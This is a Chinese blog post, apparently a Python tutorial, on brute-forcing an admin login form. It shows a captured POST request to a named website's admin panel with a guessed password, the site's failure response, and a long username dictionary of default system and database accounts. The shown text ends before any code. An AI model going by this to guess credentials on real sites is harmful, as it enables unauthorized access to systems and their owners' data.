python3---读写文件、POST表单请求、HTML处理、列表分割遍历,进行暴力破解用户名与密码

python3—读写文件、POST表单请求、HTML处理、列表分割遍历

1、测试的目标网站,进行暴力破解用户名与密码

POST https://696365wz.com/admin.php/?action=login HTTP/1.1
Host: 696365wz.com
Connection: keep-alive
Content-Length: 63
Cache-Control: max-age=0
Origin: https://696365wz.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://696365wz.com/admin.php/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

adminname=admin&adminpassword=qaz123456&form=%E6%8F%90%E4%BA%A4


HTTP/1.1 200 OK
Date: Tue, 07 Jan 2020 01:04:54 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 786
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="x-ua-compatible" content="ie=7" /><title>提示信息</title><link href="/static/admincp/css/main.css" rel="stylesheet" type="text/css" /></head><body><div class="container"><h3>提示</h3><div class="infobox"><h4 class="infotitle3">登录信息有误或帐号未激活,请重试!</h4><script type="text/javascript">setTimeout("location.href='/admin.php/';",3000);</script><p class="marginbot"><a href="/admin.php/" class="lightlink">如果您的浏览器没有自动跳转,请点击这里</a></p></div></div></body></html>

2、暴力破解的字典,用户名与密码文件信息

用户名字典:
Administrator
Guest
admin
root
user
accountAdmin01
testuser
accountUser
reportsUser
appAdmin
mongouser
db2inst1
db2admin
db2fenc1
dasusr1
mysql
test
guest
sa
probe
repl_publisher
repl_subscriber
distributor_admin
SYSTEM
SYS
DBSNMP
SCOTT
OUTLN
MDSYS
ORDSYS
WKSYS
OLAPDBA
CTXSYS
OLAPSYS
ORDPLUGINS
QS_CBADM
demo
ORACLE
missys
RMAN
QS_OS
QS_ES
SH
PM
OE
HR
QS_WS
QS
QS_ADM
QS_CS
QS_CB
Mon_user
Dba
entldbdbo
entldbreader
jagadmin
PlAdmin
pkiuser
PortalAdmin
pso
dbo
probe
sybmail
tomcat
both
role1
test@example.com
root@example.com
ftp
Ftp
FTP
manager
lp
sys
adm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

徐为波

看着给就好了,学习写作有点累!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值